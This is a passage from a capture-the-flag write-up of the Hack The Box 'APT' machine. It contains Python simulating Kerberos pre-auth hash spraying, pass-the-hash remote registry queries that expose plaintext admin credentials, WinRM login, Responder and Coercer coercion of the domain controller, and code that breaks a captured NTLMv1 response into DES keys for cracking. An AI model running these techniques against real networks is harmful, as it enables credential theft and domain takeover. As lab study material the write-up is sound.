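    return rc4_hmac_encrypt(nt_hash, KEY_USAGE_AS_REQ_PA_ENC_TIMESTAMP,
                            client_now.strftime(KRB_TIME_FMT).encode())

def kdc_check_preauth(real_hash: bytes, blob: bytes, kdc_now: datetime,
                      max_skew: timedelta = timedelta(minutes=5)) -> str:
    """KDC side. Decrypt first; only then can the timestamp be compared, so a
    KRB_AP_ERR_SKEW answer proves the client used the right key."""
    try:
        ts = rc4_hmac_decrypt(real_hash, KEY_USAGE_AS_REQ_PA_ENC_TIMESTAMP, blob)
    except ValueError:
        return "KDC_ERR_PREAUTH_FAILED"
    client_time = datetime.strptime(ts.decode(), KRB_TIME_FMT).replace(tzinfo=timezone.utc)
    if abs(kdc_now - client_time) > max_skew:
        return "KRB_AP_ERR_SKEW"
    return "OK"

def spray(real_hash: bytes, candidates, client_now: datetime, kdc_now: datetime) -> dict:
    """Attacker tries each candidate hash as pre-auth key against a KDC that
    holds real_hash; mirrors `nxc smb -k -H hash_lists` above."""
    return {c.hex(): kdc_check_preauth(real_hash, build_pa_enc_timestamp(c, client_now), kdc_now)
            for c in candidates}

# Constructed scenario from values on this page: KDC holds henry.vinson's hash,
# attacker clock is 24m17s ahead of the DC (nmap: "-24m17s from scanner time").
HENRY_HASH = bytes.fromhex("e53d87d42adaa3ca32bdb34a876cbffb")
CANDIDATES = [bytes.fromhex(h) for h in (
    "2b576acbe6bcfda7294d6bd18041b8fe",   # Administrator (stale)
    "31d6cfe0d16ae931b73c59d7e0c089c0",   # empty password
    "e53d87d42adaa3ca32bdb34a876cbffb")]  # the hit
ATTACKER_NOW = datetime(2025, 8, 8, 16, 19, 6, tzinfo=timezone.utc)
KDC_NOW = ATTACKER_NOW - timedelta(minutes=24, seconds=17)

if __name__ == "__main__":
    for h, verdict in spray(HENRY_HASH, CANDIDATES, ATTACKER_NOW, KDC_NOW).items():
        print(h, verdict)
```

Re-running the same spray after syncing the clock turns the SKEW entry into a plain success, which is why fixing time with htpdate comes before any Kerberos spraying.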
I tried many pass-the-hash approaches with these credentials without result. 0xdf's writeup showed that reg.py can query the remote registry, and the most interesting hive is HKU, which holds the profile data of every loaded user.
Query HKU:
┌─[sg-vip-1]─[10.10.14.44]─[c1trus33@htb-bbskiercmm]─[~/apt]
└──╼ [★]#$ impacket-reg -hashes aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\SOFTWARE
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\SOFTWARE
HKU\SOFTWARE\GiganticHostingManagementSystem
HKU\SOFTWARE\Microsoft
HKU\SOFTWARE\Policies
HKU\SOFTWARE\RegisteredApplications
HKU\SOFTWARE\Sysinternals
HKU\SOFTWARE\VMware, Inc.
HKU\SOFTWARE\Wow6432Node
HKU\SOFTWARE\Classes
There is a key belonging to the hosting company's management system. Query GiganticHostingManagementSystem:
┌─[sg-vip-1]─[10.10.14.44]─[c1trus33@htb-u1vrulfebt]─[~]
└──╼ [★]# impacket-reg -hashes aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\SOFTWARE\\GiganticHostingManagementSystem
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\SOFTWARE\GiganticHostingManagementSystem
UserName REG_SZ henry.vinson_adm
PassWord REG_SZ G1#Ny5@2dvht
That yields a set of credentials. Verify them:
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# nxc smb htb.local -u henry.vinson_adm -p G1#Ny5@2dvht
SMB dead:beef::b885:d62a:d679:573f 445 APT [*] Windows 10 / Server 2016 Build 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB dead:beef::b885:d62a:d679:573f 445 APT [+] htb.local\henry.vinson_adm:G1#Ny5@2dvht
evil-winrm -i apt.htb.local -u henry.vinson_adm -p G1#Ny5@2dvht
After uploading winPEAS and collecting information, I found that the machine still accepts NTLMv1.
NTLMv1 is the early version of NTLM and has multiple weaknesses: it is vulnerable to man-in-the-middle attacks and its responses are cheap to crack. Modern environments should disable it.
So I can try to capture a Net-NTLMv1 hash with Responder.
Capturing requires something that triggers the authentication. Coercer can force a Windows server to authenticate to our listener, but I did not know whether it supports IPv6.
Coercer is a Python script that automatically coerces a Windows server to authenticate to an arbitrary machine through 12 methods.
Fortunately, it does support IPv6.
# start the listener first
responder -I tun0 -A
# use Coercer to force the target to authenticate to us
coercer coerce -l 10.10.14.44 -t dead:beef::b885:d62a:d679:573f -u henry.vinson_adm -p 'G1#Ny5@2dvht' -d htb.local --always-continue
This captured an NTLMv1-SSP hash; try hashcat on it:
APT$::HTB:F681BEA6307C583400000000000000000000000000000000:3D5F4B993970DFEEB95CD301EDA08423D82A971D5B79F873:6c000197fce73869
Cracking failed. That is expected: APT$ is the domain controller's machine account, whose password is a long random string that no wordlist contains.
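A wordlist is the wrong tool for this capture, and the structure of the response shows why. As an added example (not code from the writeup, Responder or hashcat), the block below parses the captured line, detects the ESS/SSP variant from its all-zero LM field (MS-NLMP 3.3.1), derives the 8-byte value that the three DES operations actually encrypt, and shows how DESL splits the 16-byte NT hash into 7 + 7 + 2 key bytes, so the third DES key has only 65536 possibilities and the other two can be searched in the DES keyspace regardless of password length. Running DES itself needs a library and is left out; the field names are this example's own.

```python
import hashlib

def parse_responder_ntlmv1(line: str) -> dict:
    """Split Responder's capture format user::domain:lm_resp:nt_resp:server_challenge."""
    user, _, domain, lm, nt, chal = line.strip().split(":")
    lm_b, nt_b, chal_b = (bytes.fromhex(x) for x in (lm, nt, chal))
    if len(lm_b) != 24 or len(nt_b) != 24 or len(chal_b) != 8:
        raise ValueError("not an NTLMv1 response")
    # NTLMv1 with ESS ("NTLMv1-SSP"): LM field = 8-byte client nonce + 16 zero bytes,
    # and the DES input becomes MD5(server_challenge || client_nonce)[:8].
    ess = lm_b[8:] == bytes(16)
    if ess:
        client_nonce = lm_b[:8]
        des_challenge = hashlib.md5(chal_b + client_nonce).digest()[:8]
    else:
        client_nonce = None
        des_challenge = chal_b  # plain NTLMv1: the server challenge is encrypted directly
    return {"user": user, "domain": domain, "ess": ess,
            "server_challenge": chal_b, "client_nonce": client_nonce,
            "des_challenge": des_challenge, "nt_response": nt_b}

def expand_des_key(key7: bytes) -> bytes:
    """7 key bytes -> 8-byte DES key: 56 bits spread 7 per byte, low bit left
    for parity (MS-NLMP DESL / impacket's __expand_DES_key)."""
    k = key7.ljust(7, b"\x00")
    return bytes([
        (k[0] >> 1) << 1,
        (((k[0] & 0x01) << 6) | (k[1] >> 2)) << 1,
        (((k[1] & 0x03) << 5) | (k[2] >> 3)) << 1,
        (((k[2] & 0x07) << 4) | (k[3] >> 4)) << 1,
        (((k[3] & 0x0F) << 3) | (k[4] >> 5)) << 1,
        (((k[4] & 0x1F) << 2) | (k[5] >> 6)) << 1,
        (((k[5] & 0x3F) << 1) | (k[6] >> 7)) << 1,
        (k[6] & 0x7F) << 1,
    ])

def ntlmv1_des_keys(nt_hash: bytes) -> list[bytes]:
    """DESL: NT hash split into 7 + 7 + 2 bytes (last padded with five zeros).
    Each key encrypts the same 8-byte des_challenge, giving the three 8-byte
    blocks of nt_response. The blocks are independent, so recovering the NT
    hash costs one 2^16 search plus two 2^56 DES searches, no matter how long
    the password is. Wordlist cracking of a random machine password is hopeless."""
    parts = [nt_hash[0:7], nt_hash[7:14], nt_hash[14:16] + bytes(5)]
    return [expand_des_key(p) for p in parts]

def des_blocks(parsed: dict) -> list[tuple[bytes, bytes]]:
    """(ciphertext_block, des_challenge) pairs, one per DES key: the form a
    DES-keyspace attack works on (each block is DES_Ki(des_challenge))."""
    nt = parsed["nt_response"]
    return [(nt[i:i + 8], parsed["des_challenge"]) for i in (0, 8, 16)]

# The line Responder captured above.
CAPTURED = ("APT$::HTB:F681BEA6307C583400000000000000000000000000000000:"
            "3D5F4B993970DFEEB95CD301EDA08423D82A971D5B79F873:6c000197fce73869")

if __name__ == "__main__":
    r = parse_responder_ntlmv1(CAPTURED)
    print("ESS:", r["ess"], "DES input:", r["des_challenge"].hex())
    for ct, pt in des_blocks(r):
        print(f"DES_Ki({pt.hex()}) = {ct.hex()}")
```

The third block alone is enough to confirm whether a capture is attackable: 65536 DES trials recover the last two bytes of the NT hash, after which the remaining two blocks are standard single-DES known-plaintext problems.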